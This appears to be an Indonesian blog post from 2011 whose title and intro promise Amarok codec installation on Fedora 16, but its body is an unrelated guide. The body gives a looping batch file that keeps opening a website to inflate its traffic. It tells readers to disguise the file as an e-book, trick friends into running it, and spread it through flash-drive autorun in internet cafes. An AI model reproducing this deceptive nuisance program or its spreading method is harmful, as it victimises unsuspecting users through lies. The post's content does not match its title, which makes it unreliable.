Date: 22 Dec 2011
Categories: archive, category/catatan, category/computer, category/linux
Description: Memasang atau menginstall Codec Amarok untuk Linux Fedora 16
Keywords: Codec, Media Player, Fedora 16, Music
Summary: Update artikel kali ini cuma mau share dikit nih pengalaman temen saya.
Yups, temen saya ini masih awam dalam mengoperasikan system Linux. Varian
Linux yang di coba untuk pertama kalinya adalah <strong>Fedora 16</strong>,
Padahal saya nyaranin supaya make Ubuntu aja (yang sangat mudah untuk
digunakan). Ketika selesai installasi Fedora 16, dia dibikin pusing karena tidak
bisa memutar musik. Itu semua dikarenakan tidak disertakannya Codec karena
alasan hak cipta atau apalah saya ga ngerti.

%h1 Install Codec Amarok Pada Fedora 16
<p>Update artikel kali ini cuma mau share dikit nih pengalaman temen saya.
Yups, temen saya ini masih awam dalam mengoperasikan system Linux. Varian
Linux yang di coba untuk pertama kalinya adalah <strong>Fedora 16</strong>,
Padahal saya nyaranin supaya make Ubuntu aja (yang sangat mudah untuk
digunakan). Ketika selesai installasi Fedora 16, dia dibikin pusing karena tidak
bisa memutar musik. Itu semua dikarenakan tidak disertakannya Codec karena
alasan hak cipta atau apalah saya ga ngerti.</p>

<p>Sebelumnya saya sudah menulis artikel tentang <a href="/article/membuat-bookmark-situs-favorite-anda-dengan-MS-DOS-batch-file" title="Bookmark Jadul Ala Batch" target="_blank"><strong>Pembuatan Bookmark Jadul Dengan Program Batch</strong></a>, Kini dengan menyisipkan 4 baris kode untuk meningkatkan traffic website/blog anda dengan cara iseng + nakal. Step pertama, siapkan dulu Text editor favorite anda baik Notepad, Wordpad, Gedit, Nano, Notepad++ <em>&amp;</em> lainnya. Ketikkan sekelumit kode dibawah ini...<pre><code>@ECHO off
<em>:buka</em>
start http://www.nurulimam.info/
GOTO buka
</code></pre>Simpan text yang sudah di tulis tadi dengan nama <code>jangan-dibuka.bat</code> <em>&amp;</em> pilih Save as type ke All Files. Ayo dicoba-coba dengan mengklik dua kali file tersebut. Oia kelupaan, Ganti <code>http://www.nurulimam.info/</code> dengan situs yang mau dikasih traffic nakal. Step kedua, Upload filenya <em>&amp;</em> suruh teman-teman anda di Facebook, Twitter, <em>&amp;</em> lain-lain untuk segera mendownload file tersebut. Sedikit anda berbohong <em>&amp;</em> katakan klo file itu adalah file kesukaannya. Klo teman anda menyukai e-book, katakan bahwa file itu adalah e-book.</p>

<p>Step ketiga ini diutamakan bagi yang <del>tidak suka berbohong</del>. Siapkan Flashdisk, Kirim file tersebut kedalam Flashdisk, Buat autorun yang berfungsi menyebarkan file tersebut ke semua device yang terpasang di komputer. Sebarkan ke warnet-warnet terjauh. Sistem kerjanya jika ada client yang membuka komputer warnet tadi dengan menyisipkan flashdisk, maka file tersebut akan segera tersimpan pada Flashdisk sang client <em>&amp;</em> ketika client tadi mencolokkan Flashdisk tadi kedalam komputer, maka ketika Autorun berjalan file tersebut akan menyebar kesemua device <em>&amp;</em> menjalankan fungsinya yaitu membuka website anda.</p>

<p>Untuk pembuatan Autorun itu gampang kok, Tinggal searching di Google.com. Mohon maaf, Saya tidak bisa menertakan pembuatan autorun tersebut dikarenakan perbuatan itu dapat merugikan orang yang tidak tahu. Jadi silahkan cari sendiri aja deh...</p>